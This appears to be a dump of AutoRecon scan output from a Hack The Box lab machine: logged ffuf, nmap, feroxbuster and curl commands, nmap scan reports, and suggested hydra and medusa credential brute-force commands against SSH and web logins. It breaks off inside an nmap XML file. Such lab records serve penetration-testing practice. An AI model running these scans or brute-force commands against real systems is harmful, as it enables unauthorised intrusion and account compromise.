ffuf -u http://encoding.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.encoding.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_encoding.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: CaVSHfCVQYqVqvUahOxO.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_full_tcp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/kali/htb/results/scans/_top_100_udp_nmap.txt" -oX "/home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml" 10.129.123.2
nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.129.123.2
feroxbuster -u http://10.129.123.2:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.123.2:80/.well-known/security.txt
curl -sSikf http://10.129.123.2:80/robots.txt
curl -sSik http://10.129.123.2:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.123.2
curl -sk -o /dev/null -H "Host: JqivbBibaLLbuUZdVXDy.haxtables.htb" http://haxtables.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.129.123.2:80 2>&1
wkhtmltoimage --format png http://10.129.123.2:80/ /home/kali/htb/results/scans/tcp80/tcp_80_http_screenshot.png
ffuf -u http://haxtables.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.haxtables.htb" -fs 1999 -noninteractive -s | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_haxtables.htb_vhosts_subdomains-top1million-110000.txt"


@@ -0,0 +1,57 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_full_tcp_nmap.xml 10.129.123.2
adjust_timeouts2: packet supposedly had rtt of -498094 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -498094 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -201839 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -201839 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1007316 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -1007316 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -586644 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -586644 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -437252 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -437252 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -233933 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -233933 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.026s latency).
Scanned at 2023-01-28 20:06:56 CET for 71s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: HaxTables
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
Aggressive OS guesses: Linux 5.0 (95%), Linux 5.0 - 5.4 (95%), Linux 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), Linux 2.6.32 (92%), Infomir MAG-250 set-top box (92%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (92%), Linux 3.7 (92%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=36902%PV=Y%DS=2%DC=T%G=Y%TM=63D5729
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=106%GCD=1%ISR=10C%TI=Z%CI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O
OS:3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=FE88%W2=
OS:FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSN
OS:W7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N
OS:%T=40%CD=S)
Uptime guess: 46.015 days (since Tue Dec 13 19:46:08 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1025/tcp)
HOP RTT ADDRESS
1 25.62 ms 10.10.14.1
2 26.90 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:08:07 2023 -- 1 IP address (1 host up) scanned in 71.78 seconds


@@ -0,0 +1,96 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.129.123.2
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.129.123.2
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.123.2:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.123.2/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.123.2 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.123.2/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.123.2 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.123.2:80 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.123.2:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/results/scans/tcp80/tcp_80_http_wpscan.txt"


@@ -0,0 +1,2 @@
Identified HTTP Server: Apache/2.4.52 (Ubuntu)


@@ -0,0 +1,58 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/results/scans/xml/_quick_tcp_nmap.xml 10.129.123.2
adjust_timeouts2: packet supposedly had rtt of -660845 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -660845 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -666152 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -666152 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -583847 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -583847 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.028s latency).
Scanned at 2023-01-28 20:06:56 CET for 29s
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 ((Ubuntu))
|_http-title: HaxTables
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 5.0 (89%), Linux 5.4 (89%), Linux 5.0 - 5.4 (88%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (88%), Linux 3.1 (88%), Linux 3.2 (88%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (87%), OpenWrt White Russian 0.9 (Linux 2.4.30) (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/28%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63D5726D%P=x86_64-pc-linux-gnu)
SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=B)
SEQ(SP=FF%GCD=1%ISR=10D%TI=Z%II=I%TS=A)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T6(R=N)
T7(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 46.015 days (since Tue Dec 13 19:46:08 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 25.03 ms 10.10.14.1
2 26.51 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:07:25 2023 -- 1 IP address (1 host up) scanned in 29.16 seconds


@@ -0,0 +1,52 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:06:56 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/kali/htb/results/scans/_top_100_udp_nmap.txt -oX /home/kali/htb/results/scans/xml/_top_100_udp_nmap.xml 10.129.123.2
Warning: 10.129.123.2 giving up on port because retransmission cap hit (6).
Increasing send delay for 10.129.123.2 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.123.2 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
Increasing send delay for 10.129.123.2 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
adjust_timeouts2: packet supposedly had rtt of -184576 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -184576 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -303015 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -303015 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527666 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -527666 microseconds. Ignoring time.
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.026s latency).
Scanned at 2023-01-28 20:06:56 CET for 244s
Not shown: 84 closed udp ports (port-unreach)
PORT STATE SERVICE REASON VERSION
68/udp open|filtered dhcpc no-response
80/udp open|filtered http no-response
111/udp open|filtered rpcbind no-response
120/udp open|filtered cfdptkt no-response
135/udp open|filtered msrpc no-response
177/udp open|filtered xdmcp no-response
520/udp open|filtered route no-response
593/udp open|filtered http-rpc-epmap no-response
998/udp open|filtered puparp no-response
999/udp open|filtered applix no-response
3703/udp open|filtered adobeserver-3 no-response
4500/udp open|filtered nat-t-ike no-response
49186/udp open|filtered unknown no-response
49190/udp open|filtered unknown no-response
49192/udp open|filtered unknown no-response
49193/udp open|filtered unknown no-response
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=1/28%OT=%CT=%CU=7%PV=Y%DS=2%DC=T%G=N%TM=63D57344%P=x86_64-pc-linux-gnu)
SEQ(CI=Z%II=I)
SEQ(CI=Z)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
TRACEROUTE (using port 49152/udp)
HOP RTT ADDRESS
1 25.83 ms 10.10.14.1
2 26.04 ms encoding.htb (10.129.123.2)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:11:00 2023 -- 1 IP address (1 host up) scanned in 243.96 seconds


@@ -0,0 +1,60 @@
# Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.129.123.2
Nmap scan report for encoding.htb (10.129.123.2)
Host is up, received user-set (0.039s latency).
Scanned at 2023-01-28 20:07:26 CET for 2s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
| ssh2-enum-algos:
| kex_algorithms: (10)
| curve25519-sha256
| curve25519-sha256@libssh.org
| ecdh-sha2-nistp256
| ecdh-sha2-nistp384
| ecdh-sha2-nistp521
| sntrup761x25519-sha512@openssh.com
| diffie-hellman-group-exchange-sha256
| diffie-hellman-group16-sha512
| diffie-hellman-group18-sha512
| diffie-hellman-group14-sha256
| server_host_key_algorithms: (4)
| rsa-sha2-512
| rsa-sha2-256
| ecdsa-sha2-nistp256
| ssh-ed25519
| encryption_algorithms: (6)
| chacha20-poly1305@openssh.com
| aes128-ctr
| aes192-ctr
| aes256-ctr
| aes128-gcm@openssh.com
| aes256-gcm@openssh.com
| mac_algorithms: (10)
| umac-64-etm@openssh.com
| umac-128-etm@openssh.com
| hmac-sha2-256-etm@openssh.com
| hmac-sha2-512-etm@openssh.com
| hmac-sha1-etm@openssh.com
| umac-64@openssh.com
| umac-128@openssh.com
| hmac-sha2-256
| hmac-sha2-512
| hmac-sha1
| compression_algorithms: (2)
| none
|_ zlib@openssh.com
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIzAFurw3qLK4OEzrjFarOhWslRrQ3K/MDVL2opfXQLI+zYXSwqofxsf8v2MEZuIGj6540YrzldnPf8CTFSW2rk=
| 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPTtbUicaITwpKjAQWp8Dkq1glFodwroxhLwJo6hRBUK
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 20:07:28 2023 -- 1 IP address (1 host up) scanned in 2.73 seconds


@@ -0,0 +1,94 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.93 scan initiated Sat Jan 28 20:07:25 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.129.123.2 -->
<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.129.123.2" start="1674932845" startstr="Sat Jan 28 20:07:25 2023" version="7.93" xmloutputversion="1.05">
<scaninfo type="syn" protocol="tcp" numservices="1" services="22"/>
<verbose level="2"/>
<debugging level="0"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="NSE" time="1674932845"/>
<taskend task="NSE" time="1674932845"/>
<taskbegin task="SYN Stealth Scan" time="1674932846"/>
<taskend task="SYN Stealth Scan" time="1674932846" extrainfo="1 total ports"/>
<taskbegin task="Service scan" time="1674932846"/>
<taskend task="Service scan" time="1674932846" extrainfo="1 service on 1 host"/>
<taskbegin task="NSE" time="1674932846"/>
<taskend task="NSE" time="1674932848"/>
<taskbegin task="NSE" time="1674932848"/>
<taskend task="NSE" time="1674932848"/>
<host starttime="1674932846" endtime="1674932848"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="10.129.123.2" addrtype="ipv4"/>
<hostnames>
<hostname name="encoding.htb" type="PTR"/>
</hostnames>
